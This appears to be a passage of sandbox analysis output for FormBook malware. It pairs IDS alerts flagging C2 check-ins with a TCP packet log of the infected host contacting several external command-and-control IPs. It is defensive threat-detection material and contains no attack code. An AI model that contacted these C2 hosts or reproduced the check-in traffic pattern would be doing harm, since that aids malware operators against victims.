2024-10-07T12:34:03.309278+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 104.21.5.125 | 80 | TCP
2024-10-07T12:34:05.847786+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 104.21.5.125 | 80 | TCP
2024-10-07T12:34:08.398289+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49999 | 104.21.5.125 | 80 | TCP
2024-10-07T12:34:08.398289+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 104.21.5.125 | 80 | TCP
2024-10-07T12:34:13.941938+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50000 | 3.33.130.190 | 80 | TCP
2024-10-07T12:34:16.462640+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50001 | 3.33.130.190 | 80 | TCP
2024-10-07T12:34:20.039330+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50003 | 3.33.130.190 | 80 | TCP
2024-10-07T12:34:22.447412+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP
2024-10-07T12:34:22.447412+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP
2024-10-07T12:34:28.111247+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 162.0.215.33 | 80 | TCP
2024-10-07T12:34:30.678244+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50006 | 162.0.215.33 | 80 | TCP
2024-10-07T12:34:33.201827+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50008 | 162.0.215.33 | 80 | TCP
2024-10-07T12:34:35.712226+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50009 | 162.0.215.33 | 80 | TCP
2024-10-07T12:34:35.712226+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50009 | 162.0.215.33 | 80 | TCP
2024-10-07T12:34:41.559097+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50010 | 161.97.168.245 | 80 | TCP
2024-10-07T12:34:44.112473+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50011 | 161.97.168.245 | 80 | TCP
2024-10-07T12:34:46.654874+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50012 | 161.97.168.245 | 80 | TCP
2024-10-07T12:34:49.206027+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50013 | 161.97.168.245 | 80 | TCP
                                                                                                                              2024-10-07T12:34:49.206027+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013161.97.168.24580TCP
                                                                                                                              2024-10-07T12:34:54.742279+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500143.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:57.262281+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500153.33.130.19080TCP
                                                                                                                              2024-10-07T12:34:59.817849+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500163.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:02.512579+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500173.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:02.512579+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500173.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:08.027836+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500193.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:11.501332+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500203.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:14.164268+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500213.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:15.652529+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500223.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:15.652529+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500223.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:21.946304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:24.477025+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650024209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:27.215648+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:29.758274+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650026209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:29.758274+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026209.74.64.19080TCP
                                                                                                                              2024-10-07T12:35:35.797681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002768.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:38.348515+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002868.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:40.922359+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002968.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:43.466281+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003068.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:43.466281+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003068.178.233.11380TCP
                                                                                                                              2024-10-07T12:35:48.971881+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500313.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:52.446394+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500323.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:54.075073+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500333.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:56.623411+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500343.33.130.19080TCP
                                                                                                                              2024-10-07T12:35:56.623411+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500343.33.130.19080TCP
                                                                                                                              2024-10-07T12:36:11.020258+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003538.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:13.566533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003638.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:16.078392+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003738.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:18.635812+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003838.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:18.635812+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003838.55.251.23380TCP
                                                                                                                              2024-10-07T12:36:24.286083+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:26.838386+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:29.376188+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650042162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:31.961637+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650043162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:31.961637+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650043162.0.215.3380TCP
                                                                                                                              2024-10-07T12:36:37.921582+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500448.217.17.19280TCP
                                                                                                                              2024-10-07T12:36:40.470406+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500458.217.17.19280TCP
                                                                                                                              2024-10-07T12:36:43.038469+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500468.217.17.19280TCP
                                                                                                                              2024-10-07T12:37:06.037449+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500478.217.17.19280TCP
                                                                                                                              2024-10-07T12:37:06.037449+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500478.217.17.19280TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                              Oct 7, 2024 12:34:18.530635118 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:18.537975073 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:18.542820930 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:18.542911053 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:20.039330006 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:20.045258045 CEST80500033.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:20.045309067 CEST5000380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.057733059 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.062721014 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:21.062819958 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.068662882 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:21.073477030 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.446708918 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.446728945 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:22.447412014 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:22.450231075 CEST5000480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:22.455041885 CEST80500043.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.480494976 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.485497952 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.485558033 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.501383066 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:27.506234884 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111026049 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111044884 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111056089 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111212015 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111222029 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111232996 CEST8050005162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:28.111247063 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:28.114547968 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:29.007858992 CEST5000580192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.031415939 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.036329985 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.039411068 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.051422119 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.056334972 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677895069 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677911997 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.677922010 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678037882 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678049088 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678060055 CEST8050006162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:30.678244114 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:30.678244114 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:31.557970047 CEST5000680192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.574425936 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.579560995 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:32.580127001 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.589368105 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:32.594419956 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:32.594451904 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201721907 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201790094 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201807022 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201822996 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201827049 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:33.201843023 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201863050 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201879025 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:33.201929092 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:34.101790905 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.120858908 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.126061916 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.126123905 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.156199932 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.161061049 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712127924 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712145090 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712153912 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712225914 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712271929 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712282896 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712292910 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712301970 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712332010 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712660074 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712668896 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712677002 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712701082 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712718964 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712822914 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712861061 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.716001034 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.720863104 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.949526072 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.954458952 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.954530001 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.966978073 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.971982002 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.558974981 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559026957 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559097052 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:41.559108973 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559267044 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:42.478283882 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.496710062 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.501863003 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:43.501944065 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.512648106 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.517571926 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112163067 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112292051 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112473011 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:44.115614891 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.115716934 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:45.023505926 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.042411089 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.047708988 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.047904015 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.057806015 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.062962055 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.063189030 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651693106 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651757002 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651788950 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.654874086 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:47.570539951 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.588679075 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.593934059 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:48.602351904 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.603678942 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.608473063 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205775023 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205941916 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205952883 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205962896 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.206027031 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.206062078 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.210747004 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.217426062 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.242186069 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.247157097 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.248400927 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.257118940 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.262069941 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.737018108 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.742279053 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:55.776695013 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:55.781739950 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:56.793366909 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.798825026 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:56.799273014 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.810563087 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.815521955 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:57.262166977 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:13.566473007 CEST805003638.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:13.566533089 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:14.211416006 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.229760885 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.234841108 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:15.234922886 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.245714903 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.251202106 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:15.252371073 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.072273970 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.072367907 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.078392029 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:16.758392096 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.776170969 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.781363964 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:17.781456947 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.787180901 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.792984009 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.630810022 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.630853891 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.635812044 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:18.638369083 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:18.643296957 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:23.675977945 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.680988073 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:23.681056023 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.694304943 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.699484110 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.285926104 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.285974979 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286021948 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286058903 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286082983 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:24.286091089 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286132097 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.286194086 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:24.290366888 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:25.195478916 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.214503050 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.219640017 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.222733021 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.234390974 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.239511013 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.837969065 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838063002 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838089943 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838109016 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838124037 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838141918 CEST8050041162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:26.838386059 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:26.838386059 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:27.742640972 CEST5004180192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.761538982 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.766767979 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:28.773402929 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.782408953 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:28.787513971 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:28.787544966 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376069069 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376112938 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376151085 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376188993 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376188040 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:29.376224995 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376256943 CEST5004280192.168.2.6162.0.215.33
